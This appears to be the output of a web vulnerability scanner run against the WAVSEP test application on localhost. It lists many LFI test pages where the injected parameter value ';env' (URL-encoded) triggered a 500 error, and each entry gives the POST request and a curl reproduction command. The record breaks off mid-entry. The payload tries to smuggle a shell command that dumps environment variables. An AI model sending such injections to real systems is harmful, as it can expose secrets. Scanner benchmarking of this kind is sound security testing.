Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
